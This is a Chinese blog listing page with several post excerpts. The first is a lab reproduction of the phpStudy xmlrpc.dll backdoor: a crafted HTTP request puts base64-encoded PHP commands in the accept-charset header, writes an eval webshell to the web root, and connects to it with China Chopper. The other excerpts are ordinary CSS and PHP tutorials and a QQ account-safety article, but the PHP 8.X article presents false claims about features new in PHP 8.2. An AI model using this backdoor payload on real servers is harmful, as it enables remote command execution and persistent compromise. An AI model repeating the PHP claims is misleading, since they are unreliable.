易航发布的文章 - 易航博客

REC

找到 245 篇与易航相关的结果

2025-02-03
小皮面板 phpstudy 后门漏洞 phpstudy 软件是国内的一款免费的 PHP 调试环境的程序集成包，通过集成 Apache、PHP、MySQL、phpMyAdmin、ZendOptimizer 多款软件一次性安装，无需配置即可直接安装使用，具有 PHP 环境调试和 PHP 开发功能，在国内有着近百万 PHP 语言学习者、开发者用户。但是存在后门漏洞，可直接 getshell。图片漏洞存在版本： phpStudy2016 php\php-5.2.17\ext\php_xmlrpc.dll php\php-5.4.45\ext\php_xmlrpc.dll phpStudy2018 PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll 准备工作：服务器：192.168.29.135（Windows server 2008 SP2） phpStudy2016(php-5.4.45+Apache) 一．漏洞环境搭建 1.下载 phpStudy2016 版的 phpstudy，启动后切换至 php-5.4.45+Apache 版本图片 2. 查看服务器的 IP 地址图片 3. 直接访问 http://192.168.29.135/ ，可得到以下界面（以下界面是自行配置的index.php界面，可根据情况自行配置）图片二．漏洞成因 1. 查看文件 C:\phpStudy\php\php-5.4.45\ext\php_xmlrpc.dll（这是我的安装路径，根据实际的安装情况查看安装路径），Ctrl+F 查找关键字 @evel，找到了 @eval(%s('%s'));，这也是漏洞的成因。图片三．漏洞复现 1.访问 URL：http://192.168.29.135/，进行抓取数据包操作，并且将其发送到repeater模块图片 2.添加 Accept-Encoding 和 accept-charset 参数注意事项：如果没有 Accept-Encoding 这个参数，需要手动加上，并且注意“gzip”和“deflate”之间存在一个逗号，并且中间没有空格。需要手动加上：accept-charset:执行命令的 base 64 编码 echo system("net user"); 的 base64 编码为 ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7 GET / HTTP/1.1 Host: 192.168.29.135 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,\*/\*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding:gzip,deflate accept-charset:ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7 Connection: close Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0执行结果为：图片 3.构造一句话木马写入到 web 路径下： fputs(fopen('C:\\phpStudy\\WWW\\xx.php','w'),'<?php@eval($\_POST\[1\])?>');4.将构造的语句进行 base64 加密 ZnB1dHMoZm9wZW4oJ0M6XHBocFN0dWR5XFdXV1x4eC5waHAnLCd3JyksJzw/cGhwIEBldmFsKCRfUE9TVFsxXSk/PicpOw== 修改 accept-charset 的参数值，写入一句话木马图片 5.查看服务器端是否将文件写入图片 6.使用菜刀进行连接操作，URL：http://192.168.29.135/xx.php，密码为1 图片

技术教程 # PHP

易航 1天前
0 8 1
2025-02-03
掌握这 8 个技巧，让你的 CSS 代码更简洁优雅写出简洁优雅的 CSS 代码不仅能提高代码的可维护性，还能减少样式冲突。本文将介绍 8 个实用技巧，帮你提升 CSS 代码质量。 1. 善用 CSS 变量，提升代码复用性图片使用 CSS 变量的好处：集中管理主题色值一处修改，处处生效支持运行时动态修改提高代码可维护性 2. 使用 :is() 和 :where() 简化选择器 /* 之前的写法 */ .card h2, .card h3, .card h4, .card h5, .card h6 { margin-bottom: 16px; } /* 使用 :is() 简化后 */ .card :is(h2, h3, h4, h5, h6) { margin-bottom: 16px; } /* 使用 :where() 降低优先级 */ :where(.card, .panel, .box) p { line-height: 1.5; }这个技巧可以：减少代码重复提高代码可读性灵活控制选择器优先级 3. 巧用 aspect-ratio 控制宽高比 /* 常见的 16:9 视频容器 */ .video-container { width: 100%; aspect-ratio: 16 / 9; background: #000; } /* 保持正方形的头像容器 */ .avatar { width: 100px; aspect-ratio: 1; object-fit: cover; border-radius: 50%; }这个属性特别适合：响应式图片布局视频容器卡片网格布局保持元素固定比例 4. 使用 clamp() 实现响应式数值 .title { /* 最小 16px，最大 32px，基于视窗宽度动态计算 */ font-size: clamp(16px, 4vw, 32px); } .container { /* 响应式内边距 */ padding: clamp(1rem, 3vw, 3rem); /* 响应式宽度 */ width: clamp(320px, 80vw, 1200px); }clamp() 的优势：无需媒体查询平滑过渡代码更简洁避免内容溢出 5. 使用 gap 属性简化布局间距 .grid-container { display: grid; grid-template-columns: repeat(auto-fit, minmax(250px, 1fr)); gap: 20px; } .flex-container { display: flex; flex-wrap: wrap; gap: 16px; /* 可以分别设置行列间距 */ /* gap: 16px 24px; */ }gap 属性的优点：替代传统的 margin 更容易维护间距支持 flex 和 grid 布局避免临边距叠加问题 6. 使用逻辑属性适配不同书写方向 .container { /* 替代 margin-left/right */ margin-inline: auto; /* 替代 padding-top/bottom */ padding-block: 2rem; /* 替代 width */ inline-size: 100%; /* 替代 height */ block-size: auto; }逻辑属性的优势：更好的国际化支持适应不同书写模式代码更具语义化简化 RTL 适配 7. 使用 :has() 实现父元素选择 /* 当卡片包含图片时应用样式 */ .card:has(img) { padding: 0; } /* 当表单存在错误输入时改变样式 */ .form:has(:invalid) { border-color: red; } /* 调整空列表的样式 */ ul:not(:has(li)) { display: none; }:has() 选择器的应用场景：基于子元素状态修改父元素实现复杂的条件样式减少 JavaScript 的使用提高样式的动态性 8. 使用 @layer 管理样式优先级 @layer base, components, utilities; @layer base { h1 { font-size: 2rem; margin-bottom: 1rem; } } @layer components { .button { padding: 0.5rem 1rem; border-radius: 4px; } } @layer utilities { .text-center { text-align: center; } }@layer 的优势：明确的样式优先级更好的代码组织避免优先级混乱便于维护大型项目欢迎大家留言补充。

技术教程 # Web前端

易航 2天前
0 9 0
2025-02-02
2025 年揭穿 PHP 的真相：10 个深入人心的错误 “神话” 在编程语言的江湖中，PHP 一直是一位备受争议又不可或缺的角色。2025 年，当我们重新审视 PHP 时，会发现有许多关于它的顽固神话依然在流传。下面，就让我们来一一揭穿这些神话。 1、PHP 已经过时很多人认为，随着新兴编程语言的崛起，PHP 已经日薄西山。然而，事实并非如此。据 W3Techs 统计，2024 年全球仍有 76.4%的网站在使用 PHP。像 WordPress、Drupal 和 Joomla 等主流 CMS 平台都是基于 PHP 构建的，PHP 在 Web 开发领域的根基依然牢固。 2、PHP 性能低下过去，PHP 的性能可能确实存在一些问题，但随着 PHP 8.x 版本的发布，情况有了极大的改变。PHP 8.x 引入了 JIT 编译器，大幅提升了执行速度，尤其在数值计算和循环操作方面表现出色，在处理高负载任务时也能游刃有余，与 Python、Node.js 等语言相比并不逊色。 3、PHP 不适合大型项目有人觉得 PHP 只适合小型项目，难以应对大型项目的复杂需求。实际上，Laravel、Symfony、Laminas 等成熟的 PHP 框架，为构建大型、复杂的应用提供了强大的工具和支持。它们具备 MVC 架构、ORM 技术、中间件等先进特性，能够很好地实现项目的可维护性和可扩展性。 4、PHP 代码难以维护不可否认，不规范的 PHP 代码可能会带来维护难题，但这并不意味着 PHP 本身的问题。通过遵循 PSR 等社区制定的编码规范，使用 PHPUnit 进行单元测试，利用 PHP-CS-Fixer 进行代码自动格式化等工具，可以有效提高 PHP 代码的质量和可维护性。 5、PHP 缺乏现代语言特性 PHP 从诞生以来一直在不断发展和进化。PHP 8.x 引入了联合类型、Fibers 和异步编程等现代语言特性，增强了代码的可读性和安全性，使 PHP 能够更好地适应现代开发需求。 6、PHP 社区不活跃 PHP 拥有一个庞大且活跃的开发者社区。社区中不仅有丰富的开源项目、框架和库，还能为开发者提供及时的支持和帮助。开发者们可以在社区中分享经验、交流技术，共同推动 PHP 的发展。 7、PHP 无法与新技术集成在 2025 年，PHP 积极支持与 Node.js、Python 等其他语言的集成，也能很好地融入云原生、serverless 等新的技术架构中，拓展了自身的应用范围，并非与新技术脱节。 8、PHP 不适合高并发场景传统上，PHP 在高并发处理方面可能存在短板，但随着 Swoole 等扩展的出现，PHP 具备了异步协程的能力，能够有效地处理高并发请求，在高并发场景下也有了更多的用武之地。 9、PHP 开发者就业前景不佳市场调研显示，PHP 的就业市场份额高达 82%，在 Web 开发和内容管理系统领域的需求依然强劲，为 PHP 开发者提供了良好的职业前景。掌握 PHP 技能的开发者，在就业市场上仍然具有一定的竞争力。 10、PHP 学习价值不高对于想要进入 Web 开发领域的人来说，学习 PHP 仍然具有很高的价值。它不仅可以帮助开发者快速上手 Web 项目开发，还能让开发者深入了解 WordPress 等流行 CMS 平台的开发，为进一步学习和发展打下坚实的基础。图片 2025 年的 PHP，依然在 Web 开发领域散发着独特的光芒。它不断地发展和进步，用实力打破一个又一个的神话。作为开发者，我们应该以客观、全面的视角去认识和了解 PHP，充分发挥它的优势，为技术的发展和创新贡献力量。

技术教程 # PHP

易航 2天前
0 14 0
2025-01-30
CSS view()：JavaScript 滚动动画的终结者每当我与 UI/UX 设计师开完会，他们要求我实现滚动动画时，我内心都忍不住想大声尖叫。为什么？因为我讨厌实现滚动动画。虽然它看起来很棒，实现起来也“相当简单”，但它有许多需要处理的怪癖，尤其是当涉及多个动态元素时。但当客户要求那些花哨的“滚动时淡入”效果时，你能怎么办？你只能卷起袖子写一些 JavaScript，即使这让你内心崩溃。 JavaScript 时代（黑暗时期）以下是我曾经写过的代码（如果你还在这样做，我理解你的痛苦）： window.addEventListener('scroll', () => { const elements = document.querySelectorAll('.fade-in'); elements.forEach((element) => { const elementTop = element.getBoundingClientRect().top; const windowHeight = window.innerHeight; if (elementTop < windowHeight * 0.8) { element.style.opacity = '1'; element.style.transform = 'translateY(0)'; } }); });我要么改变 CSS 属性，要么为具有动画属性的元素添加类，让它执行一些“魔法”。有趣的是，我还必须实现反向操作。这很丑陋，我讨厌它。可怜的浏览器每次滚动事件都要处理这些计算。有时我甚至能听到它的“哭泣”。在移动设备上，电池指示器会像自由落体一样下降。在积累了一些 JavaScript 经验后，我使用防抖来减少需要运行的计算次数。当然，这稍微好了一些，但这不可能是最好的解决方案，对吧？发现 Intersection Observer（一线希望）然后我发现了 Intersection Observer API。终于，有了更好的东西！我不再需要不断检查滚动位置，而是可以告诉浏览器：“嘿，当这个东西变得可见时告诉我”： const observer = new IntersectionObserver( (entries) => { entries.forEach((entry) => { if (entry.isIntersecting) { entry.target.classList.add('visible'); observer.unobserve(entry.target); // 触发后不再观察！ } }); }, { threshold: 0.2 } ); document.querySelectorAll('.animate-on-scroll').forEach((el) => observer.observe(el));结合一些 CSS： .animate-on-scroll { opacity: 0; transform: translateY(20px); transition: all 0.6s ease-out; } .animate-on-scroll.visible { opacity: 1; transform: translateY(0); }这确实好多了！但仍然……缺少了一些东西。动画要么开启，要么关闭——没有基于滚动位置的平滑控制。当客户要求那些超级平滑的视差效果或渐进式显示时，我又回到了编写复杂 JavaScript 或使用网上找到的 CSS 技巧的老路上。然后一切都变了：view() 函数然后，像 CSS 之神的礼物一样，我发现了 view()。天哪，看看这个： @keyframes fadeIn { from { opacity: 0; transform: translateY(20px); } to { opacity: 1; transform: translateY(0); } } .fade-in { animation: fadeIn linear; animation-timeline: view(); /* 关键所在 */ animation-range: entry 10% cover 30%; /* 细节控制 */ }就这样！没有 JavaScript，没有事件监听器，没有性能噩梦。只有如丝般顺滑的滚动响应动画。最棒的部分？你知道最神奇的是什么吗？性能。那些旧的 JavaScript 滚动处理程序会让我的 MacBook 风扇像要起飞一样疯狂旋转。但 view()？即使在移动设备上，也如丝般顺滑。浏览器处理所有繁重的工作，所有操作都在合成器线程上运行（这是一个花哨的说法，意思是“非常快”）。根据我们的性能测试：动画类型CPU 使用率平均 FPS内存占用JavaScript38%4512MBIntersectionObserver22%558MBCSS view()5%601MB而且，它只是……有效。不再需要调试为什么动画在错误的时间触发，或者为什么滚动位置计算偏差了几个像素。当有很多动画元素时，不再有“滚动卡顿”。它只是有效。深入理解 CSS view() 函数 CSS view() 函数的引入标志着我们处理滚动驱动动画方式的重大转变。让我们深入了解这个强大的功能，并理解为什么它正在彻底改变网页动画。 animation-timeline: view() view() 的核心是基于元素在视口中的可见性创建一个进度时间轴。你可以将其视为一个虚拟时间轴，随着元素进入视口而向前移动，随着元素退出视口而向后移动。 .element { animation-timeline: view(); }你可以自定义视口的测量方式： /* 为视口检测添加边距 */ animation-timeline: view(block 10px); /* 垂直边距 */ animation-timeline: view(inline 50%); /* 水平边距 */ animation-timeline: view(10px 20px 30px 40px); /* 所有边距 */理解 animation-range animation-range 属性定义了动画相对于元素在视口中的位置开始和结束的时间。就像为动画设置检查点。实际应用场景： 1. 渐进式图片加载 @keyframes progressive-load { 0% { filter: blur(20px); scale: 1.1; } 100% { filter: blur(0); scale: 1; } } .lazy-image { animation: progressive-load linear; animation-timeline: view(); animation-range: entry 10% cover 50%; }2. 分步式文字浮现 @keyframes staggered-text { 0% { opacity: 0; transform: translateX(-50px); } 20% { opacity: 1; transform: translateX(0); } 80% { opacity: 1; transform: translateX(0); } 100% { opacity: 0; transform: translateX(50px); } } .staggered-text { animation: staggered-text linear; animation-timeline: view(); animation-range: entry 0% exit 100%; }3. 动态进度条 @keyframes progress-bar { from { width: 0%; } to { width: 100%; } } .progress-bar { animation: progress-bar linear; animation-timeline: view(); animation-range: entry cross(10% 20%); }高级技巧 1. 多时间轴组合 .card { --rotate-axis: 30deg; animation: rotate linear, scale ease-in-out; animation-timeline: view(), scroll(root block); animation-range: entry 0% cover 50%, entry 10% cover 90%; }2. 嵌套动画控制 .parent-element { animation-timeline: view(); } .child-element { animation-delay: calc(parent-animation-progress * 0.2s); }3. 视差滚动系统 .parallax-layer { animation: translate linear; animation-timeline: view(); } .layer-1 { animation-range: entry 0% cover 100%; } .layer-2 { animation-range: entry 10% cover 90%; } .layer-3 { animation-range: entry 20% cover 80%; }浏览器支持与渐进增强截至 2024 年 12 月，推荐使用以下兼容方案： @supports (animation-timeline: view()) { /* 现代浏览器样式 */ } @supports not (animation-timeline: view()) { /* 回退方案 */ .fallback { transition: all 0.5s ease; } /* 使用 IntersectionObserver 添加 .active 类 */ }推荐使用 @scroll-timeline polyfill 为旧浏览器提供基本支持。未来展望即将推出的 CSS 滚动驱动动画规范将带来更多激动人心的特性： scroll() 时间轴类型时间轴范围自定义单位（svh, lvw）动画相位控制（animation-phase）时间轴事件监听（实验性提案）这些新功能将使创建如下效果成为可能：基于滚动速度的动画分页滚动动画嵌套滚动容器联动总结 CSS view() 的出现不仅改变了我们实现滚动动画的方式，更重新定义了网页动画的可能性边界。从简单的淡入效果到复杂的视差系统，现在都可以用声明式的简洁语法实现。虽然浏览器支持仍在推进中，但现代前端开发者应该：优先使用 CSS view() 实现基础动画使用 JavaScript 作为高级交互的补充始终考虑渐进增强策略定期关注 Scroll-driven Animations 规范的更新下次设计师再提出复杂的滚动动画需求时，你可以微笑着打开 CSS 文件——那些需要复杂 JavaScript 才能实现的效果，现在可能只需要几行优雅的 CSS 代码。图片如果您觉得内容对您有帮助，欢迎在看、点赞、分享 ⬇️❤️⬇️

技术教程 # Web前端

易航 6天前
0 18 0
2025-01-29
轻松掌握 PHP 8 新特性：15 个实用示例助你快速上手 1、命名参数：一种允许开发者通过参数名称而非位置顺序将参数传递给函数的特性。这种特性提供了更高的灵活性和可读性，使得函数调用更加清晰、直观。 function greet($name, $age) { echo "Hello $name, you are $age years old."; } greet(age: 25, name: "John");2、Union Types：允许为函数参数、返回类型等指定多种可能的类型，从而增强代码的灵活性和可重用性。 function foo(string|int $value): void { echo $value; }3、Match 表达式：一个更通用且简洁的语句选择，作为 switch 语句的理想替代品。 $result = match ($value) { 1 => "One", 2 => "Two", default => "Other", };4、Nullsafe 运算符：为简化在嵌套对象中对属性和方法的访问，特别是在可能遇到空值（null）的情况下，提供了一种优雅且高效的解决方案。通过使用 Nullsafe 运算符，开发者能够避免繁琐的 null 检查，使代码更加简洁、易读和健壮。 $length = $obj?->getProperty()?->getLength();5、属性：一种用于向类、方法和函数添加元数据的强大工具，通过它们可以扩展和定制代码的行为和功能。 #[Route("/user/{id}")] class UserController { #[HttpGet("/info")] public function getInfo($id) {} }6、构造函数属性提升：一种简洁而高效的语法，用于在类的构造函数中声明和初始化属性。 class Person { public function __construct(public string $name, public int $age) {} }7、弱映射：是一种特殊类型的映射结构，它允许我们使用对象作为键（key）来存储和检索值（value），而不会阻止这些键对象被垃圾收集机制回收。这意味着，当没有其他引用指向这些键对象时，它们可以被自动清理，从而释放内存空间。这种机制在处理循环引用和内存管理时特别有用，可以避免内存泄漏和不必要的内存占用。 $map = new WeakMap(); $map[$obj] = "value";8、新的static返回类型：现在支持作为static方法的返回类型，它表示该方法将返回一个调用类的实例。 class A { public static function getInstance(): static { return new static(); } }9、表达式抛出：在表达式中允许抛出异常，这一特性在三元运算符中尤为实用。 $result = $value > 0 ? $value : throw new InvalidArgumentException("Invalid value");10、Stringable 接口：通过实现 Stringable 接口，对象可以定义自己的 toString() 方法，从而将其转换为字符串表示形式。 class MyClass implements Stringable { public function __toString(): string { return "MyClass"; } }11、get_debug_type() 函数的主要功能是：返回给定变量的类型信息，以字符串的形式呈现，包括对象的具体类名。通过调用此函数，您可以轻松获取并了解变量在程序运行时的精确类型，从而有助于调试和排错。 $type = get_debug_type($var);12、str_contains() 函数的功能是：在指定的字符串中搜索另一个字符串的存在性，以确定第一个字符串是否包含第二个字符串。如果第一个字符串包含第二个字符串，则该函数返回 True；否则，返回 False。这是一个非常实用的字符串操作函数，经常用于文本处理、数据分析和模式匹配等场景。 if (str_contains($haystack, $needle)) { echo "Found"; }13、str_starts_with() 和 str_ends_with() ：是两个用于检查字符串是否以特定子字符串开头或结尾的实用函数。这些函数在字符串处理中非常有用，因为它们可以帮助我们快速确定一个字符串是否符合特定的格式或标准。 if (str_starts_with($string, $prefix)) { echo "Starts with prefix"; }14、fdiv()函数：主要功能是执行浮点数除法运算，并返回相应的浮点结果。该函数接收两个浮点数作为参数，并返回它们的商，以便用户可以在程序中执行精确的数学计算。无论是正数、负数、零还是非数字（NaN）等特殊情况，fdiv()函数都能准确处理并返回正确的浮点结果。 $result = fdiv(10.0, 3.0);15、@非异常错误运算符：允许用户抑制非异常性错误，如通知和警告信息，以便更流畅地处理其他重要任务。 $value = @some_function(); // Suppress errorsThese features offer improvements in terms of performance, readability, and ease of use in PHP 8.图片

技术教程 # PHP

易航 6天前
0 21 0
2025-01-28
这些看似 “方便” 的工具，正在影响你的 QQ 安全！ QQer 们知道吗？在我们的手机和电脑里或许隐藏着一些“隐形黑客” 随时可能引发风险今天，鹅 sir 就给大家来扒一扒它们是如何影响你的 QQ 使用体验甚至偷偷窃取你的隐私！图片 01 常见开源工具：看似“有用”，实则满满的隐患 Magisk：变身有风险，改装需谨慎来自 QQer 小 A 的“惨痛”故事：小 A 为了想让 QQ 更"个性化"，在不知名的平台下载安装了 Magisk，并安装了第三方插件，结果几天后游戏账户被盗了，原来是黑客利用恶意 Magisk 插件窃取了他的账号信息。小 A 哭诉到：“个性化？不存在的！” Magisk 是什么？ Magisk 是一个用于 Android 设备的系统改造工具，一些用户会试图通过它来修改 QQ 的 UI 界面，或者实现拦截消息撤回、屏蔽广告等操作。黑产团伙也喜欢利用 Magisk 提供的各类插件进行恶意操作，比如批量加群、加好友、发送非法内容，甚至大规模操控 QQ 账户。 Xposed：定制的背后，隐患满满来自 QQer 小 B 的“社死”经历小 B 用 Xposed 插件防撤回，结果第二天QQ 卡成“幻灯片”，还被领导质问为什么在工作群里发垃圾广告。小 B 一边尴尬到脚趾抠城堡，一边在工作群里道歉。 Xposed 是什么？ Xposed 是一个 Android 系统中，劫持 APP 应用的第三方框架，它允许用户通过模块定制和修改系统和应用程序的行为。与 Magisk 一样，Xposed 也被一些用户用来实现“修改 QQ 界面、消息防撤回”等功能，黑产团伙则通过它来进行批量加群、引流等恶意行为。 iOS 越狱工具：解锁“自由”，丢失安全来自 QQer 小 C 的“自由”代价小 C 的 iPhone 越狱后，想着可以更自由地篡改 QQ 功能，结果手机系统“罢工”，QQ 账号被盗，QQ 好友们纷纷收到恶意链接。 iOS 越狱工具是什么？ iOS 越狱是通过利用系统漏洞或其他方法，使得用户可以获得对设备操作系统的完全控制权。通过越狱，用户可以安装和运行未经苹果批准的应用，修改系统设置等。比如一些用户会通过越狱工具提升 iOS 系统权限，安装一些篡改 QQ 功能的工具，如消息防撤回，自动抢红包，屏蔽广告等。而黑产则使用越狱工具在 QQ 上实现违规批量群发、评论引流等恶意操作。自动点击工具：伪装成“帮手”的危险工具来自 QQer 小 D 的“作弊”后果小 D 为了抢红包，使用了自动点击工具，结果不仅红包没抢到，反而被群友调侃他的“作弊行为”，形象大损。自动点击工具是什么？自动点击工具可以模拟用户在屏幕上的点击操作，帮助减少手动操作的重复性。一些用户会用它来抢红包或完成签到任务，黑产则利用它来批量管理 QQ 账号、注册、登录、群发消息等。 02 第三方协议挂、NT 外挂工具： QQ 生态里的“隐形破坏者” 来自 QQer 小 E 的“省心”教训小 E 为了快速管理群聊，使用了某第三方协议挂工具，很快发现自己 QQ 的好友和群聊被乱加，一些不认识的人开始频繁骚扰他。原来这些工具背后居然是黑产团伙，利用他的账号发布诈骗广告。“省心”最后变成了“麻烦”。第三方协议挂、NT 外挂工具是什么？由于 QQ 官方机器人具有较高的注册门槛，使得一些用户更倾向使用市面上一些来源不明的 QQ 协议挂，机器人工具，来实现对账号、好友、群聊等场景的批量管理。黑产用户则多见于使用自己定制的协议挂、外挂工具进行恶意广告传播、诈骗引流等操作。 03 各位代挂平台：看似便捷，实则风险重重来自 QQer 小 F 的“飞升”噩梦小 F 找代挂平台想让 QQ 等级“飞升”，结果一觉醒来，账号被封，原因是被黑产操控，发了大量黄图引流，号死加社死，小 F 懊悔不已：“飞升不成，掉坑倒是飞快。” 代挂平台是什么？这些代挂平台提供 QQ 账号的等级提升、签到、养号等服务。用户通过购买代挂服务，并将自身 QQ 账号密码或授权登录二维码交予代挂平台，代挂平台完成账密或扫码登录，帮助用户完成各类操作。 ⚠️ 使用外挂工具有多危险？外挂工具看似方便，实则可能严重威胁到个人隐私、账号和设备安全，具体危害包括：隐私泄露：可能窃取你的个人信息、聊天记录和账号密码，暴露给黑产团伙，隐私面临巨大风险。账号被盗：绕过防护盗取账号信息，用于骚扰、广告传播或非法操作。恶意操作：黑产利用外挂批量加群、引流或进行诈骗等非法操作，破坏 QQ 环境，影响其他用户体验。设备安全风险：外挂工具会削弱设备的安全防护，易受病毒、木马攻击。财产与名誉损失：账号被盗或滥用可能导致经济损失和名誉受损，甚至卷入法律纠纷。 📒 来自鹅 sir 的安全建议为了保护 QQer 们的账号和信息安全最好的办法当然是远离这些外挂工具让 QQ 在正常、健康的环境中运行若需扩展 QQ 功能，请通过官方渠道避免使用未经验证的第三方工具安全又放心！还有，记得定期将 QQ 更新至最新版本并保护好自己的账号密码哦最后，鹅 sir 想说 “安全操作”才是最酷的“外挂”~

技术教程

易航 1月28日
0 12 0
2025-01-28
PHP 8.X 深入探讨 PHP 性能改进特性概述作为一个充满激情的开发人员，我很高兴地见证了 PHP 这个广受赞誉的服务器端脚本语言在过去二十年中的发展。现在，随着 PHP 8.X 的发布，PHP 作为世界各地开发人员强大而可靠的选择的主导地位比以往任何时候都要强大。PHP 8.X 系列，包括 PHP 8.0，PHP 8.1，以及截至 2022 年 11 月的 PHP 8.2，推出了大量的增强功能和新功能，但最值得注意的是，与其前辈相比，它提供了显着的性能提升。在本文中，我很高兴能够深入探讨 PHP 8.X 带来的性能改进和高效处理。通过彻底检查和分析这些前沿的增强功能，我的目标是为开发人员和技术爱好者提供宝贵的见解，以了解 PHP 8.X 中的关键优化。这一全面的探索将使您能够充分掌握拥抱 PHP 8.X 的好处，并了解其对您的 Web 应用程序和整个 PHP 生态系统的潜在影响。所以，让我们深入了解 PHP 8.X 为我们准备的显著进步。图片 PHP 8.X 简介 PHP 8.X 系列始于 2020 年 11 月 26 日发布的 PHP 8.0，随后是 2021 年 11 月 25 日发布的 PHP 8.1。这些版本引入了几个突破性的功能，以及实质性的性能改进，对 Web 开发环境产生了积极的影响。 PHP 8.0 中值得注意的特性包括即时（JIT）查询器、属性（也称为注释）、命名参数、nullsafe 运算符和匹配表达式。PHP 8.1 继续构建在 PHP 8.0 奠定的坚实基础上，引入了新的特性，如枚举，只读属性，纤程（为了更好的并发支持），以及新的语法改进，如使用字符串键和第一类可调用的数组解包。 PHP 8.2 引入了许多新特性，包括： Co-routines：Co-routines 是一个新特性，它允许 PHP 开发人员编写并发代码，而不需要线程。联合类型：联合类型是一个新特性，允许 PHP 开发人员定义一个变量来保存一组类型中的任何一个。改进的错误处理：PHP 8.2 对错误处理进行了许多改进，包括更好的错误消息和更优雅地处理错误的能力。属性（注释）图片在 PHP 8.X 中，属性已经取代了用于添加元数据的效率较低且容易出错的 docblock 注释，这显著影响了 PHP 性能。通过提供对属性的原生支持，PHP 8.X 确保了在编译时对其进行验证，消除了可能由不正确的元数据引起的运行时问题。这种标准化的方法鼓励 PHP 社区采用元数据和流程管理的最佳实践，最终提高 PHP 的整体性能和 Web 服务器应用程序的效率。此外，属性由于其元数据提取的标准化方法，促进了与各种开发工具、监控工具和框架的更好集成。这就增强了 IDE、静态分析器和其他开发工具的支持，优化了 PHP 性能，丰富了开发体验。因此，属性不仅提高了 PHP 代码的质量，而且还促进了更高效和更精简的开发过程，从而在 Web 服务器上实现了性能更好的 PHP 应用程序。考虑一个在 Web 应用程序中验证用户输入的简单用例。以前，开发人员会使用 docblock 注释来提供关于验证规则的元数据，然后在运行时解析这些元数据。这可能会导致性能开销和潜在的运行时错误。使用 PHP 8.X 属性，开发人员现在可以直接向代码添加元数据，并在编译时进行验证。下面是一个比较旧的 docblock annotation 方法和新的 attributes 方法的例子： PHP 7.x 及更早版本 /** * @ValidationRule("email") * @ValidationMessage("Please enter a valid email address.") */ class EmailValidator { // ... }PHP 8.X use App\Validation\ValidationRule; use App\Validation\ValidationMessage; #[ValidationRule("email")] #[ValidationMessage("Please enter a valid email address.")] class EmailValidator { // ... }在上面的示例中，PHP 8.X 基于属性的方法提供了一种更干净、更有效的方法来向 EmailValidator 类添加元数据。通过利用属性，开发人员可以消除与解析 docblock 注释相关的运行时开销，从而提高 PHP 性能和更高效的 Web 服务器应用程序。命名参数 PHP 8.X 中的命名参数提供了一定程度的灵活性，在修改或扩展函数时会显著影响 PHP 的性能。通过显式命名参数，开发人员可以轻松地添加、删除或更改参数的顺序，而不会破坏现有的 PHP 代码。这鼓励代码的可重用性和模块化设计，以及简化对每个参数的目的的理解。最终，命名参数有助于更好地维护和高效的 PHP 代码库，提高 PHP 在 Web 服务器上的性能。通过使用命名参数，开发人员可以创建更具表现力和自文档化的 API，这对于 PHP 性能调优至关重要。此功能有助于理解复杂函数，特别是在处理大量参数、默认值或可选参数时。因此，命名参数有助于减少开发人员的认知负荷，使编写、审查和调试 PHP 代码变得更加容易。这导致了更健壮和高效的 PHP 应用程序的开发，进一步增强了 PHP 在 Web 服务器上的性能。无命名参数（PHP 7.x 及更早版本） function sendEmail($to, $subject, $body, $from = 'noreply@example.com', $isHtml = true) { // ... } // Call the function without named arguments sendEmail('john@example.com', 'Welcome', '<h1>Hello, John!</h1>', 'info@example.com', true);使用命名参数（PHP 8.X）： function sendEmail($to, $subject, $body, $from = 'noreply@example.com', $isHtml = true) { // ... } // Call the function with named arguments, but skip the `from` and `isHtml` parameters sendEmail( to: 'john@example.com', subject: 'Welcome', body: '<h1>Hello, John!</h1>' );在此示例中，由于未显式指定from和isHtml参数，因此将跳过它们。将使用这些参数的默认值。这是提高代码可读性和可维护性的好方法。通过使用命名参数，可以明确哪些参数是必需的，哪些参数是可选的。这可以帮助减少错误并使代码更可重用。以下是使用命名参数时需要记住的其他一些事情：必须在任何位置参数之后使用命名参数。不能两次使用同一个参数名。如果没有为可选参数指定值，则将使用默认值。如果为可选参数指定值，则默认值将被忽略。 Nullsafe 运算符通过简化可空对象的处理，nullsafe操作符允许开发人员编写更优雅、更少出错的 PHP 代码，从而增强 PHP 在 Web 服务器上的性能。这可以带来显著的改进，因为它减少了处理空值所需的条件逻辑的数量。在最新的 PHP 版本上运行的 PHP 应用程序可以减少共享内存占用量并缩短执行时间，进一步增强 PHP 8.X 中此功能的优势。 nullsafe操作符还鼓励在 PHP 应用程序中采用更一致的错误处理方法，特别是在处理数据库查询和 SQL 查询时。通过推广可空类型的使用并减少处理空值所需的样板代码，开发人员可以创建更干净、更可维护的代码库。这种处理可空对象和空相关错误的一致方法可以产生更稳定和更高性能的应用程序，并在 PHP 社区中培养更统一的编码风格。不使用Nullsafe运算符（PHP 7.x 及更早版本）：class User { public function getCompany() { // Fetch company data from the database } } $user = getUserFromDatabase(); if ($user !== null) { $company = $user->getCompany(); if ($company !== null) { $companyName = $company->name; } else { $companyName = 'Not available'; } } else { $companyName = 'User not found'; } echo $companyName;使用Nullsafe Operator（PHP 8.X）：class User { public function getCompany() { // Fetch company data from the database } } $user = getUserFromDatabase(); $companyName = $user?->getCompany()?->name ?? 'Not available' ?: 'User not found'; echo $companyName;在上面的示例中，PHP 8.X nullsafe运算符（？->）简化了可空对象的处理，并减少了所需的条件逻辑的数量。这会产生更优雅、可读性更强、更易于维护的代码，有助于在 Web 服务器上提高 PHP 性能。匹配表达式 PHP 8.X 中匹配表达式的引入使开发人员能够以更有效和可读的方式处理复杂的条件逻辑，这可以显着提高 PHP 在 Web 服务器上的性能。通过消除对 break 语句的需求并提供详尽的匹配，减少了人为错误的可能性。匹配表达式不仅提高了代码的可读性，而且还支持更高级的模式匹配功能。通过添加匹配表达式，开发人员现在可以以更简洁和优雅的方式表达复杂的条件和模式匹配。这可能会导致更多的维护代码，因为开发人员可以轻松地理解和修改复杂的逻辑，而不会迷失在 if-else 语句或 switch 案例的海洋中。因此，匹配表达式有助于 PHP Web 应用程序的整体效率和性能。枚举为了提高 PHP 